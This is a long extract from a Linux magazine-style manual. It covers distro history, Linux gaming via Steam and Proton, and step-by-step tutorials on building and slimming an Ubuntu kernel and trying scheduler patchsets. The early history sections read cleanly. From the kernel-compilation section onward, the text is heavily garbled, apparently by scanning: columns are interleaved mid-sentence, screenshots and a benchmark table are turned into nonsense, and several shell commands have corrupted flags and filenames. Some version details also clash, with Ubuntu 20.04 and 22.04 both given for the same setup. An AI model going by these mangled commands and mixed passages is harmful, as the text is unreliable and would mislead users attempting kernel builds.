Two core release branches we'll quickly mention are Arch Linux and Gentoo, both released around 2000. Gentoo (named after the fastest penguin in the world) is a built-from-source distro compiled with specific optimisations for the hardware it's going to run on. This is very clever, but also very time-consuming. Google's Chrome OS is derived from Gentoo. In early 2002, Arch Linux was released, devised as a minimalist distro, where the user does much of the installation work to create an OS with just the parts required. This DIY approach was partly why Arch is renowned for its amazing documentation and for rolling out the earliest releases of new versions of software.
At the height of the distro madness (around 2010), there were almost 300 Linux distros - we'd argue an unsustainable number - with many just repeating basic desktop functionality already available in core root distros. Progressing into the 2000s, and with increasing

> With big bucks come big offices! Here's the Red Hat HQ sporting its old logo.
CREDIT: Bz3rk, CC BY-SA 3.0 https://en.wikipedia.org/wiki/Red_Hat#/media/File:Red_Hat_headquarters_at_Raleigh,_North_Carolina,_US_-_9_November_2013.jpg

Get your Linux game on


There's always been a niche interest in gaming on Linux, but this was mostly done through Wine, which has been around since the mid-90s and frankly always felt like a sticking plaster to enable World of Warcraft or whatever the current Windows game of choice was to be played on Linux.
Things started to change when Valve ported its Source engine to Linux along with releasing its Steam for Linux client in 2012. This opened the gate for Source-based native Linux game distribution. In addition, at the end of 2013 Valve announced it was creating SteamOS, a dedicated Debian-based distro for running its Steam client. This was to tie in later with its failed attempt at creating a Steam Machine ecosystem. Today there are over 7,000 native Linux games available on Steam, out of around 14,000 in total.
Perhaps more significant is that Valve never stopped developing SteamOS, despite its Steam Machine failure. In 2018 Valve released its own internal fork of Wine called Proton that was integrated into Steam itself and propelled Linux support for Windows games to a new level, with currently a reported 50 per cent of games offering Platinum compatibility.
But why all this work just to help the one per cent of Steam's gamers who use Linux? This summer Valve revealed its Steam Deck, a Linux-powered hand-held PC console, which it promised would run all Windows games via its Steam Proton layer. Perhaps 2021 is the year of the Linux desktop after all...

> Google's Android (not a distro) is frowned upon in the Linux world, but you can't deny the effect it had on the market.

complexity in maintaining a modern OS, the number of distros started to reduce, but that didn't stop well-organised groups creating popular new distro forks when they felt a need.
A good example is Raspberry Pi OS, a rebrand of Raspbian, itself a fork of Debian. The new Arm-based hardware platform needed a dedicated operating system, so picking up Debian and refitting it for the Raspberry Pi, including educational software, libraries for its GPIO access, and tailored tools to configure its hardware, made absolute sense.
Linux hardware specialist System76 was tired of niggling software issues associated with using other distros, and wanted direct control. So, it introduced Pop!_OS, a fork of Ubuntu, to not only directly support its laptops and desktop hardware, but also its customers' needs. It's a slick, modern distro, with support for popular software and hardware.
Linux Mint started in 2006 as a small personal Ubuntu fork project. When Ubuntu changed to its "modern" Unity desktop design in 2011, many users revolted. The Linux Mint project created its own "classic" desktop, called Cinnamon, in 2012, and it brought many former Ubuntu users with it. The Linux Mint project has stuck with its "user first" design approach, and evolved remarkably well.
This doesn't even touch upon commercially focused distros, such as Android, Chrome OS, Intel's Clear Linux, Google's Wear OS, Sailfish OS, and the host of server-specific distros. Even today, there are well over 200 active Linux distros, and they're as diverse, interesting, and wonderful as the communities that use them.

> Linux Mint became one of the most popular distros by, unbelievably, giving users what they wanted!

Looking forward
But what of the future? Technology predictions are notoriously tricky, but why would we ever let that stop us? Will Tux still be active in 30 years? We'd say that's a safe bet; even if all development stopped now, people would keep on using it for years if not decades. There are retro computer systems that are still ticking over after almost as long, and the Linux kernel is far more functional than they ever were.
A more likely scenario is Google, as an example, moving to an alternative kernel - Fuchsia, say - though this would likely just be for Android and its IoT devices. Yet even if Google moved literally everything it runs to Fuchsia, the Linux kernel is used so widely elsewhere that it would just keep on trucking.
As we've seen, the Linux world is larger than just its kernel. An OS is a whole ecosystem of interconnected systems that have to be developed, tested and packaged in an orchestrated manner. Linux was built on GNU tools and its licence: this widened the appeal of Linux and enabled the kernel with suitable distros to be deployed in such vastly differing devices, from the fastest supercomputer in the world to a lowly $4 Pi.
The Linux kernel isn't tied to the success of any one corporation. Sure, there's the Linux Foundation and Torvalds himself, but succession has already been put into place to keep kernel development going if Torvalds should step down. And while the Linux Foundation isn't strictly necessary, it's certainly handy to orchestrate and handle funding and trademarks.
Put all of that aside, the reason Linux has succeeded is that it's damn good at its job and everyone can contribute. It's the single greatest software development project of modern times, which doesn't mean it's perfect - it's software after all - but it's continually improved and enhanced, it's strong copyleft open source, it fostered a fabulous community and it's given us all endless opportunities. So keep on enjoying it!



Build the Kernel
The kernel is what makes Linux tick. Jonni Bidwell is happy to get his hands dirty and help you tune up those ticks...

Linux, if you want to be annoyingly precise about it, isn't a complete operating system. It is but a kernel. And like the kernel of a seed pod, it requires all the surrounding bits to be useful.
A bootloader can happily load a Linux kernel with no init system specified, and it will just sit there. Without userspace applications (for example, systemd in the first instance) telling the kernel what to do it will simply idle. Yet it has the potential to do almost anything. The kernel includes everything you would think of as being a low-level component of the operating system, as well as some things you might think belong elsewhere. This includes drivers, filesystems, network protocols, schedulers (process and I/O), memory allocators and all kinds of other treasure.
In the early days of Linux, users would regularly have to face compiling their own kernels, sometimes to get new hardware support, sometimes to reconfigure their way out of brokenness, and sometimes to improve performance. Users of Linux from the Scratch or Gentoo days will be familiar with the kernel compilation process, since it's more or less mandatory there. But it's an option for any flavour of Linux, so we thought we'd have a go at making building kernels more accessible.
As we'll discover, the Linux Kernel is huge and complicated. It may be tempting for some to pore over it with a fine-toothed comb, trying to "optimise" it for speed or size. But this is for the most part hopeless, and more likely to result in breakage than anything else. If you want a faster, more responsive kernel, then a better approach is to use one of the many custom efforts that are available.


Grasp the kernel basics


Just what is a kernel and why is it telling my computer what to do?
> The kernel is a modular masterpiece that can run everything from old AGP graphics to the Large Hadron Collider.

When you think of an operating system (OS) it ought to be an umbrella term for the 'thing' that's responsible for everything your computer does after the BIOS/UEFI hands over control to the bootloader. For popular systems such as Windows and macOS it's easy to lump everything together thusly. There's no choice of desktops, no option to boot to a (real) command line and no real way to replace core applications (like Explorer and Finder). On Linux it's clear that things are much more modular. The progression from UEFI to bootloader to kernel to login screen is much more demarcated. If you're quick you can even identify the moment the kernel hands over to the initialisation system (for example, systemd or runit). Yet it turns out that every operating system has a kernel.
The falsehood that macOS is based on BSD (perpetuated by lazy journos and Mac users who like to claim their OS is more grown up than it is) stems from the Darwin OS upon which it's based. Darwin is open source and partly BSD-based, but it also borrows from other OSes (particularly NeXTSTEP, which was bought by Apple in 1997). Darwin has its own kernel called XNU (an acronym for X is Not Unix), which unlike Windows and Linux is a hybrid, as opposed to a monolithic, affair. It's based on the Mach kernel, originally a research project into microkernels, with BSD functions added (so it's not a "BSD-based" kernel). The more shiny layers of macOS, namely the Aqua GUI, the Cocoa/Carbon interfaces and various application services, are all proprietary and have nothing to do with BSD.

Mainlining
Over the page we'll look at compiling a trivially modified Ubuntu kernel. Canonical apply patches and backported fixes to their kernels, with the effect that an Ubuntu kernel bearing the version number 5.13.0, say (which we got by running uname -a on our Ubuntu 20.04 VM) may be constitutionally very different from a "mainline" Kernel 5.13 that you would download from https://kernel.org. You might want to build your own mainline kernel, for example if you suspect a bug has been fixed upstream (or indeed, if you think that an Ubuntu patch introduced the bug). That's easy: just extract the source tree and follow the instructions over the page.
What's even easier is using the pre-packaged mainline kernels produced by the Ubuntu team. First read the blurb at https://wiki.ubuntu.com/Kernel/MainlineBuilds, then follow the link there to the Mainline Kernel Archive. You'll see that while Ubuntu 21.10 and the LTS (if it's kitted out with the Hardware Enablement stack) are running Kernel 5.13, the current in-development series (confusingly also called "mainline") is 5.17. We don't advise trying out these release-candidate (RC) kernels at first. But you may have reason to try the Longterm branch, which currently is 5.15. As of now, this branch is used by Pop!_OS and it's what the next LTS of Ubuntu will be based on.

> A smorgasbord of kernels can be found at https://kernel.org, from bleeding-edge RCs to the SLTS 4.4 series.

Driving the deal
The XNU kernel has its own driver API called IOKit, and Windows' kernel has the less imaginatively titled "Windows Driver Model". Drivers (programs that talk to hardware) are perhaps the easiest component of a kernel to get your head around, in the sense it's easy to see why they need to be there. The only trouble is, most modern Linux distros have very few drivers baked in to their kernels. Instead, the preferred approach is to include drivers compiled as external modules, which can be loaded early on in the boot process by Udev when the corresponding hardware is detected. Modules plug straight into the kernel, and for the most part act as if they were a part of it. Other kernel components can be 'modularised' and loaded on demand too, but certain low-level systems (for example, the one for loading modules in the first place) have to be built in.
So the Linux Kernel contains drivers for every bit of hardware supported by Linux. Well, almost. Modern hardware (particularly Wi-Fi and GPUs) often requires firmware to be uploaded to it on every boot, otherwise it won't work. This firmware is generally not included in distributions' kernel source packages (since it's not source code and sometimes proprietary), but rather shipped in a separate linux-firmware package. Since this package is required for all the drivers in the kernel (usually packaged as linux-image-...) to work, we can't forget its size (lib/firmware occupies over 700MB on our system). Drivers themselves occupy fairly negligible space.
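You can get a feel for this modular arrangement on any running system. As a rough illustration (the i915 module below is only an example - substitute any name from your own lsmod output):
$ lsmod | head                                   # the modules currently plugged into the running kernel
$ modinfo i915 | head                            # describes one module, its licence and any firmware files it wants
$ ls /lib/modules/$(uname -r)/kernel/drivers     # where your distro keeps driver modules for the running kernel
Between them these show how little driver code actually lives inside the kernel image itself.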


Compiling a kernel
Get straight to business and build your own Ubuntu-esque kernel

To compile your own kernel using Ubuntu (or any distro that uses Ubuntu kernels, for example Mint or elementary OS, but not Pop!_OS) the first step is to get hold of the kernel sources. The official channel for vanilla kernel sources is https://kernel.org, but this isn't necessarily the best place to start. Instead, we'll use an Ubuntu kernel, which includes numerous patches and backported features. It also has the advantage of coming with a configuration very close to what you're currently running (in fact it's identical if you have the same version). So if we make only small changes there, then we'd hope the resulting kernel still has all the functionality of the old.
Besides the kernel source files, we also need the required build tools. If you've ever compiled anything before you'll probably have all these. But if not, get them with the following:
$ sudo apt build-dep linux linux-image-$(uname -r)
Using uname like this ensures the build tools you're about to download correspond to the kernel you're running, and that both are new. If you updated your system before this command, you might want to reboot (in case a new kernel was available) and then fetch the build tools (and kernel sources). If the command complains about not being able to find source packages, you may need to uncomment the lines beginning deb-src in /etc/apt/sources.list for both the main and updates repositories. Alternatively, since we've got a bit of a Perl flavour going on this issue, this little snippet will do it for you:
$ sudo perl -i.bak -pe "s/^# (deb-src .* $(lsb_release -cs)(-updates)? main restricted$)/\$1/" /etc/apt/sources.list
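For reference, the lines the snippet (or your editor) needs to end up with look roughly like the following - the mirror URL and release name here are illustrative and will vary with your install:
deb-src http://gb.archive.ubuntu.com/ubuntu/ focal main restricted
deb-src http://gb.archive.ubuntu.com/ubuntu/ focal-updates main restricted
If they still start with a #, they're commented out and apt source won't find anything.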
Those dependencies are plentiful (and include Java and LaTeX), but our story is not yet done. The (slightly outdated) Ubuntu wiki at https://wiki.ubuntu.com/Kernel/BuildYourOwnKernel mentions that the previous command doesn't install everything required. And that statement is still correct. The following packages should fill in any gaps, but if not you'll be told what's missing:
$ sudo apt install libncurses-dev fakeroot kernel-package
You may see a warning about updating kernel-img.conf, in which case you should choose to install the package maintainer's version. In any event, let's get hold of those sources:
$ apt source linux-image-unsigned-$(uname -r)
If you're running the HWE kernel, which you probably are if you're running an up-to-date desktop edition of Ubuntu 22.04, then the sources will land in the linux-hwe-5.13-5.13.0/ directory. You'll also be told that the HWE kernel package is developed on Git, and that more up-to-date sources can be acquired via:
$ git clone git://git.launchpad.net/~ubuntu-kernel/ubuntu/+source/linux/+git/focal
Either way, once we have the sources we may as well disable the source repositories. If you used the Perl command earlier you can do this with:
$ sudo mv -f /etc/apt/sources.list{.bak,}
Incidentally, the apt source directive will get the source code to absolutely any package in Ubuntu (or whatever apt-based distro you're using). Neat. We didn't use sudo in the apt command because sources are downloaded to the current directory, which we carefully made sure was the home directory. The full kernel sources are large (1.2GB for Ubuntu 21.10) and apt will fail if there's insufficient space. If this happens hit Ctrl-C, delete the linux-hwe* files in your home directory, and try again somewhere with plenty of space.

> Switching from ZSTD to LZ4 compression reduced the time taken to load the kernel on our virtual machine, although not by anything significant.

Time to compile
Having successfully downloaded the sources, let's configure and compile them. When you compile the Linux kernel, you're free to include or exclude whatever components you want. Traditionally, these were selected from a glorious text-based menu accessed by running make menuconfig. Things have moved on now and there's a modern configuration interface. Don't get too excited, though - it's still text based, but now it's powered by ncurses and has a hacker-style black background. Summon this with:
$ cd linux-hwe-5.13-5.13.0/
$ make nconfig
See? Glorious. Navigate through the menus using the cursor keys and Enter. Options are selected or deselected (or selected to be built as modules) using Space, but don't change anything just yet (you can always quit, by pressing Escape, without saving and run the last command again to return). Instead, let's have a look at what's in your kernel.
Everything's organised into menus, one of which is Device Drivers, which we've already talked about. You'll also see sections for Memory Management, Networking, Virtualisation and a few others that all might be expected to appear in an OS. Sections that house further options have ---> at the end.
We'll start by making a single, simple change. Go to the General setup category. Inside you'll see lots of confusing options, some of which have been selected according to Ubuntu's default configuration. The option to use ZSTD compression, you might recall, became the default in a recent Ubuntu release.
> Compiling kernels will really put your CPU through its paces. Our laptop got too hot to type on (now there's an excuse for late copy! - Ed).
We can find out more about a particular option by Note this is documented precisely nowhere. Finally
highlighting it and pressing F2. Doing this in the kernel let’s build the thing:
compression mode option tells us something about $ fakeroot make-kpkg -j “$(nproc)” —initrd -append-to-
which compression options work best on what system, version-’+lxf” kernel-image kernel-headers
as well as a considered note about who to contact Now make a cup of tea because the stock Ubuntu
if certain options don’t work. Let’s switch to LZ4 kernel is rather fully featured. You’ll see files being listed as
compression and see if we can spot a difference. they’re being compiled, linked and generated. It’s
reasonably pleasing to watch, but you may need another
See what’s on the SLAB cup of tea. On our XPS13 it took most of a lunch hour
If you like odd-sounding acronyms, have a look in the (Who said you were allowed an hour for lunch!? - Ed) to
Choose SLAB allocator menu (towards the bottom of the finish up, over the course of which it got rather hot. Even
General setup menu). Before you get dragged in Covid-free draughty corridors of Future Towers.
deep into the rabbit’s warren of kernel options, exit by All going well you should see twc .deb packages in
pressing F9 and make sure you save the configuration. your home directory (not the source directory): one
You’ll be told it’s stored in a file named .config. containing the kernel image, and one containing the
One slight quirk with using the Ubuntu kernel is that headers. We’ve been careful to only do a very trivial
it’s configured by default to use Canonical’s Trusted modification (so, only changing the compression
System Keys. Because these aren’t included in the format) for our first outing. And with good reason.
kernel sources, the build will fail without some These packages are going to replace the current kernel
intervention. We can either manually disable the keys packages on the system. This shouldn't really be a
(they’re deep in the Cryptographic Services menu), problem since Ubuntu always has a fallback kernel on
or we can use the helpful Debian scripts: hand, but we don’t really want our first effort to result
$ scripts/config -set-str SYSTEM_REVOCATION_KEYS in a kernel panic. See how you fare with:
$ scripts/config -set-str SYSTEM_TRUSTED_KEYS $ sudo dpkg -i linux-‘.deb
This sets these to blank strings. The config program The kernel should be installed as Grub’s new default.
also has a -disable argument, but if you use that here Check after a reboot with the uname-a command, and
it breaks because a string value is required here. if necessary hold down Shift to bring up a boot menu.

Colonel Kurtz advises...


Using the Ubuntu (technically Debian) tools to build kernels is all well Did we say finally? Not quite - we still need to run sudo depmod to
and good. But if you’re just hacking away on a kernel for personal enumerate our modules, and then (finally) update grub with sudo
usage, you might not want to go to the bother of packaging it all. And update-gmb.
it’s certainly inconvenient to do as we’ve done and replace the current
> If you like
kernel packages with custom ones, since those packages will be
endless options,
overwritten as soon as Ubuntu release a new kernel.
settings and
It's not recommended to try and build these packages with different
frobs all arranged
names, and it's likely to break things if you try to use any other kind of
in an Ncurses
workaround here. Instead, you can build kernels using the mainline
interface then
tools and not worry about packaging them. You can run make nconfig
you'll love this.
from the sources directory to use the (modern) ncurses configurator.
Then once you’ve saved it run make to build it and sudo make
modulesjnstall to install the modules. Finally, you’ll want to copy the
kernel image to /boot with sudo make install.

The Hacker’s Manual | 35


Distros

Kernel minification
Perfection is reached not when there’s nothing left to add,
but rather when there’s nothing left to take away...
y this point the chances are you’ve already had a Another reason for removing things is demonstrated

B look around the config menu and have noticed


there's an awful lot of stuff in there you don’t
need. This is probably true, and a lot of people are
interested in making the kernel smaller.
by the Linux-libre kernel. Here, drivers that require
proprietary firmware or microcode have all been
removed. As has firmware and microcode itself, which
if you take a look at your /lib/firmware directory (ours
People building for embedded systems, where storage was over 700MB) adds up to a substantial saving. Of
space and memory are scarce, naturally will want to pull as course, removing firmware files should be done carefully,
much stuff as possible out of the kernel. We’ve mentioned since any device depending on them will cease to
that there isn't really a performance or memory hit from function. There’s also the annoyance of carefully
having so many unused drivers compiled as modules. removing unneeded files, only for a new linux-firmware
However, there is a disk space hit, although perhaps not as package to appear and not only replace them, but add
large as you might think (see box, below). yet more unnecessary cruft.

> At first glance,


m lx20lxf-Stxnd«rd-PC-Q3S-ICH3-2OO9: -/llnux^kg/lkiux-wc^K Spotting superfluous fireware
there’s a lot of
lxT0lxr.SUnd.rd.A<^SS-ICH».2OO9: -/I... Ur0<xr.SUnd«rd-PC^3S-ICH»-2OO9: -/I... Ixr^lxf-SUnd.rd Depending on your hardware it might be easy to see
superfluous
which firmware files you need, or at least which ones
drivers in the • config. - LinuxZx86_JxlS.1 Kernel Configuration
kernel. But ।— SCSI device support-------------------------------------------------------------------------------- you don’t need. For example, if you don’t have an
you never know {M) RAID Transport Class
AMD graphics card then you can remove the 56MB of
SCSI device support firmware in /firmware/amdgpu. or indeed the 7MB of
when you’ll need
[*] legacy /proc/scsi/ support
tape access... ^^***SCSIsupporttype(disl<itape;CO^ROM)***^ bits in /firmware/radeon for older cards. There’s a small
SCSI tape support
volume of firmware for the Nouveau driver, the open
<M> SCSI CDROM support
source offering for Nvidia cards, but it’s not really worth
<M> SCSI generic support
[*] /dev/bsg support (SG v4) worrying about at this stage.
<M> SCSI media changer support
<M> SCSI Enclosure Support To get some idea about which firmware has been
[*] Verbose SCSI error reporting (kernel size += 36K)
loaded on your system, run journalctl -b to bring up the
[*] SCSI logging facility
[*] Asynchronous SCSI scanning journal for the current boot. Press / to instigate a search,
SCSI Transports --->
[*] SCSI low-level drivers and search for firmware. On our XPS we found the
following lines (and then some irrelevant matches to do
with UEFI keys):

Colonel Kurtz advises...


Space (at least the space taken up by the driver at around 20MB. Nouveau, the FOSS
kernel) on modern hardware shouldn’t be a driver for Nvidia cards is by comparison a tiny
concern. The compressed kernel image / 3.4MB. So axing whichever of these you don't
boot/vmlinuz on our Pop!_OS system need is a start to slimming down your kernel.
occupies a mere 11MB. And the Drivers on Linux are small, you might have
accompanying modules, found in /lib/ noticed. Even AMDGPU is tiny compared to
modules/5.15.../ occupies around 425MB. the equivalent massive (-450MB) download
Any other Ubuntu-based system will have on Windows. The difference is that very little
similar statistics (unless you have been of that Windows package is 'driver'. Most of
tweaking things already). If half a gigabyte is it is firmware, oh and shiny but useless (if not
important to you (which it might be on old outright annoying) gameware applications. So
hardware) then recompiling a leaner kernel in reality removing drivers one by one is a
(with only the required drivers) would be one fairly thankless exercise (the kernel
way to achieve that. Naturally, that comes configuration interface doesn't make this > The kernel sources directory gets big once
with the downside that if you ever acquire easy either). It's unlikely to liberate more than you start compiling. Here the Intel graphics
different hardware, it won't work with the a couple of hundred megabytes. Of course, bits are occupying half a gigabyte.
slimline kernel. there's plenty else to remove too. but again
Further investigating in the modules/ each component is small and sometimes
directory reveals that the network, media and much more critical than it sounds. So blindly
GPU device drivers together occupy the most removing swathes of them is likely going to to
space (165MB). If you examine further you’ll end you up with a broken, (but undeniably
see that AMDGPU is the largest graphics leaner) kernel.

36 | The Hacker's Manual


Build the Kernel
8Fet
[dim] Finished loading DMC firmware i915/kbl_dmc_
txf04xf-SUnd«rd-PC-Q3$-ICHS-a
verl_04.bin (vl.4)/
<- C O fl *rchUnux.OQ/title/Mo<lp'o 0 O 0 = lxfOtxf-SUnd*r<J-PC-<}J$-l... IxfQlxf-SUndard-PC-QSS-l.
athlOk_pci 0000:3a:00.0: firmware ver WLAN.RM.4.4.1-
00157-QCARMSWPZ-l/
■ Comparisons using kernel version 5.13.1. where a Kemel/Traditional compilation is
made with the default Arch configuration.
CC
CC
CC
(MJ
(H)
(MJ
drtvers/htd/surface-htd/surface_htd_core.o
drtvers/crypto/vtrtto/vtrtto.cfypto.core.o
drtvers/crypto/qat/oat_coMon/adf_gen2_hw_d4
CC [M] drtvers/htd/surface-htd/surface_htd.o

So our Intel graphics need to run DMC (nice) firmware A Machine • of


Compiler , _ „ „ _ ,
Total Kernel
Conpllatlon Compilation
CC
LO
(MJ
(mJ
drtvers/stagtng/nedta/atontsp/pcl/atontsp.fi
drtvers/crypto/vtrtlo/vtrtlo_crypto.o
CPU threads localmodconfig Modules _ CC [MJ drlvers/crypto/tnstde-secure/safexcel.o
Time Time CC [MJ drtver$/crypto/qat/qat_como«/adf_gen4_bw_di
and our wireless chip needs something too. The latter CC [M] drtv*r$/Md/surface-htd/surface_kM.o
CC (MJ drtver$/crypto/qat/qat_coMon/qat_crypto.o
5950X @ 3? , No S44? Sm SSs
doesn't explicitly tell us which firmware file it needs, but if 4.55 GHz
11.1.0
CC
CC
[H] drtver$/$tagtng/nedta/atofltsp/pcl/atont$p_f(
drtvers/htd/htd-core.o
CC [m] drtvers/crypto/qat/qat_comon/qat_algs.o
we look at the output of Ispci we can obtain a model Ryzen CC (MJ drtvers/crypto/tnstde-$ecure/safexcel_rtng.<
5950X© 32 111 0 Yes 227 Im 32s 57$ CC (MJ drtvers/stagtnq/nedta/atontsp/pct/atontsp_t<
CC drtvers/htd/htd-tnput.o
number (QCA6174). And it turns out there's a /lib/ 4.55 GHz CC (MJ drtvers/crypto/tnslde-$ecure/safexcel_ctph«i
CC [M] drtver$/crypto/qat/qat_coMAwi/qat_asyM_algs
firmware/athl0k/QCA6174 directory, so that’s probably 5950X© 32 1^’1 No 5442 9m 5s Im 13s CC
CC
[MJ
[n]
drtvers/crypto/qat/qat_comon/qat_uclo.o
drtver$/crypto/tn$tde $ecure/$afexcel_ha$h.(
4 55 GHz CC drtvers/htd/htd-qutrks.o
what we want. Ry2*n
CC
CC
(MJ drlvers/stagtr>g/nedta/atoMsp/pcl/atoMsp_s«
drtvers/htd/htd-debug.o
5950X @ 32 1^1 Yes 227 2m 13$ Im 13$
CC (MJ drtvers/crypto/qat/qat_coMon/qat_hal.o
Again, unless you're seriously strained for space it’s 4.55 GHz ID (mJ drivers/crypto/in$tde-secure/crypto_$afexce1
CC (mJ drlvers/crypto/aMloglc/antogtc-gxl-core.o
not really worth picking your firmware directory apart Note: These results do not prove that GCC is faster than Clang at building the kernel.
CC
CC
[M] drtver$/$tagtng/Medta/atoat$p/pct/ataMt$p_t|
drtvers/htd/htdraM.o
The GCC version used in these benchmarks is self built and optimded. CC (m] drtvers/crypto/anlogtc/anlogtc-gxl-ctpher.o
like this. At least it wasn’t on our XPS. But we do CC
CC (mJ
drlvers/htd/htd-genertc.o
drtvers/stagtng/nedta/atOMlsp/pct/atontspv^
The main results of the benchmark is that 80% of the build time of j 'full* kernel is CC (MJ drtvers/crypto/qat/qat_coMon/adf.transport.
maintain a growing collection of old hardware, including spent on modules. Given that only a fraction of those modules are reeded by any

the undying Eee PC from 2007. With only 2GB of SSD,


there can be no wasted bytes. Indeed, such old hardware
doesn't need any firmware at all. Naturally, we've make-kpkg this time, going instead back to first > Prolific Arch
slimmed down the kernel to next to nothing as well. If principles. So this approach should work on other distros contributor
you’re making a kernel that’s tailored for particular too. Once the image builds we need to follow the Graysky has
released some
hardware, then a common technique is to build any instructions in the Colonel Kurtz Advises box. Let's
benchmarks for
required drivers into the kernel image as opposed to assume you’ve done that, and installed your modules
his modprobed-
building modules. The kernel configuration interface and kernel, run depmod and the like.
db helper utilty.
even has its own mechanism for selecting modules Those steps should build a corresponding initrd
based on what’s currently loaded. (initial ramdisk/ramfs image) and put it in /boot where
To use this, make sure any hardware you’d like the it can be found by GRUB. If you’re not using GRUB, for
new kernel to support is plugged in and working. example you’re on PopLOS which uses systemd-boot,
$ make localmodconfig then extra work may be required to get the bootloader to
This generates a configuration based on the current
kernel configuration together with any currently loaded
modules. In general, this results in a kernel that still has a
Give modules the heave-ho
number of extraneous modules, but if you have the “If you’d rather have those
patience to iteratively compile, test and remove then
eventually you'll find your way to kernel bliss. It car be drivers compiled into the
taxing to manually load every possible driver, and in
some cases it’s hard to resolve hardware names to kernel, as opposed to as
module names. It’s particularly frustrating when you
miss a key module (yes, you do need SCSI disk support
modules, you can use the
believe it or not) and have to rebuild the whole thing. command localyesconfig
One tool that can help you with this is Modprobed-db
(see https:Z/github.com/graysky2/modprobed-db), instead”
which keeps a database of all the modules ever loaded
on the system. This increases the chances that hardware pick up the new kernel. We were pleasantly surprised
you haven't plugged into the system for ages will still this all worked almost without a hitch on our PopLOS
work with the new kernel. laptop. But do study the documentation for the
kernelstub utility before going in with all guns blazing.
Where to compile your drivers? Systemd-boot requires the whole kernel to live on the EFI
If you’d rather have those drivers compiled into the partition, and you don’t want to accidentally fill this up.
kernel, as opposed to as modules, you can use the As you become more involved with building kernels,
command localyesconfig instead. If a previous you’ll grow more and more familiar with the
configuration from an older kernel exists, you’ll be asked configuration interface and where particular options
about new drivers that have been added to the new hide. You’ll also find that, contrary to widely misheld
sources. Usually it’s okay to accept the defaults he-e. belief, Linux does in fact support a huge amount of
Once the new configuration is written out we can use a hardware. From HAM radio to steering wheel controllers
handy script to see any differences, like so: (new in 5.15) to ISDN modems (remember them?).
$ scripts/diffconfig config.old config There’s also a good amount of weirdness. If you nosey
You should notice a lot of lines in the new file (prefixed deep enough into the kernel sources themselves then
by +) are now set to negative. Let’s try building our diet­ you can find plenty of interesting stuff. The arch/x86/
sized kernel with a simple purgatory subdirectory for example contains
$ make -j$(nproc) VM-specific code. Specifically, purgatory is an object
The nproc incantation (used on the previous page that sits between running kernels (for example, when a
too) ensures compilation is divided into parallel jobs, one new kernel is about to be loaded). If the process goes
for each CPU core. This might make your machine wrong the kernel hangs with a friendly “I'm in purgatory"
difficult to work with while it’s all building, but will message. It's possible to disable purgatory, but this
certainly speed up compilation time. We're not using won’t absolve you of your sins.

The Hacker's Manual | 37


Distros

Popular patches
Forget trawling through configs - use a pre-rolled patchset to set the rules.
e’re always impressed by Colorado-based can set program 'niceness’ manually using the renice

W System76 and its contributions to Linux.


Not only does it make glorious hardware
and a fine desktop environment, it's also put in aothers
effort tweaking behind-the-scenes kernel settings. This
command. Howeve-, this needs to be set every time a
process is spawned, so the advantage of Ananicy (and
lot of like it) is that multiple nicenesses (niceties?) can
be set automatically. All the user needs to do is start a
work has culminated in the System76 Scheduler systemd service.
service, which tweaks the kernel’s CFS (Completely
Fair Scheduler) settings for lower latency when on AC Interpreting levels of niceness
power. You don’t even have to be using Pop!_OS to take Technically, niceness is distinct from priority, in the sense
advantage of it, but if you are it’ll automatically that processes have a value for both. Priority can take any
prioritise foreground applications, as well as common value from rt (realtime) to -51 (very high priority) to 20
desktop processes such as Gnome Shell and Kwin. (normal priority). By default, user processes (and most
system processes) are given a priority of 20, important
system processes have a priority of 0, and really
Processes playing nice important ones have even lower. If two processes
competing for CPU :ime both have the same priority, then
“If two processes competing the process with the lowest niceness takes precedence.
The Pulseaudio daemon, for example, by default runs as a
for CPU time both have the user process with a nice level of -11, so that other user

same priority, then the process processes don't make for choppy audio output.
One of the earliest and most popular patchsets
with the lowest niceness takes for the kernel is Con Kolivas’ “CK” effort. Starting out
as a set of tweaks to improve desktop performance,
precedence.” it evolved to include a series of new CPU schedulers,
culminating in BPS (the middle letter of which stands for
something rude) in 2009. Kolivas has in the past voiced
Garuda Linux is making a lot of headlines lately. The concerns about kernel developers’ lack of interest in the
slick, eye-candy heavy. Arch-based distro includes a desktop. But with BPS (and much of his scheduler work)
couple of daemons that ought to improve the intention was never to get it mainlined. It’s not
responsiveness. First there's Ananicy (ANother Auto general purpose enough for the kernel, and the kernel
NICe daemon), which automatically renices (gives has only one scheduler anyway (the Completely Fair
greater affinity) processes. The idea here (as with any Scheduler, CPS'). BFS has since been retired in favour of
scheduling tweak) isn’t to magically give you more MuQSS (Multiple Queue Skiplist Scheduler), which was
> Get Garuda’s
speed. Rather, it’s concerned with tweaking priorities so introduced in 2016.
kernel goodness
that heavy tasks (like compilation or indexing) don’t If you want to try out MuQSS, you can grab the
without the icon
garishness, with interfere with things happening in the foreground. patches directly and apply them to a vanilla source tree
Linux-TKG Nicing is a feature of the Linux kernel itself, and you (see https:Z<github.com/ckolivas/linux for
instructions). Alternatively. MuQSS has been included in
O Firefox web Browser •
various custom kernels, namely Liquorix (https://
Welcome | Carvd* Lino x Ixf^lxf-SUndard
liquorix.net) and Linux-TKG. The latter includes a choice
Q OS h«ps://wiki 2orudalinux.org erb r oni. lxf^xf-SUndardPC-935-l... txf@>lxf-SUn

(MJ drtvers/tnftntband/hw/hftl/exp_r of several schedulers, as well as some patches from


Garuda Linux wiki Q ® 9 (HJ drtvers/tnftntband/hw/bnxt_re/qp
["] drtvers/tto/tnu/tnv_tcn426M/tn\ Intel's performance-focused Clear Linux. Linux-TKG also
GarudaLinux Garuda is loaded with amazing tools and supported by a great community. ["] drtvers/ROSt/conftgfs.o
system
Tool*
(*1 drtvers/tto/tRu/tnv_tcn426e«/tn\
drtvers/tto/tnu/tnv_tcn4260e/tn\
enables you to compile the whole kernel with CPU-
requirements ["]
drtvers/tto/tRu/tnvmtCR426ee/tn*
Garuda Linur
(«]
[«) drtvers/tto/tnu/tnv_npu6dS0/tnv_ native optimisations. You might have noticed the vanilla
(«] drtvers/nost/nost usb.o
in comparison [H] drtvers/tnftntband/hw/hftl/ftle_ kernel has some CPU options (under the Processor
toother [N] drtvers/tnftntband/hw/bnxt_re/qt
popular [HJ drtvers/tnftntband/hw/bnxt_re/qp Type and Features) but these only target a particular
Garuda Gainer (HJ drtvers/Ug/tnu/tnY_npu6050/tnv_
distributions Setting* Mjnjjer drtvers/ROSt/nost_cdev.o
[«]
[«] drtver$/tnftntband/hw/bnxt_re/qp
family, rather than a given microarchitecture such as
E0 [H]
[N]
[H]
drtvers/ROSt/r»ost_snd.o
drtvers/tto/tnu/tnv_npu6050/tnv_
drtvers/tnftntband/hw/hftl/ftrnv
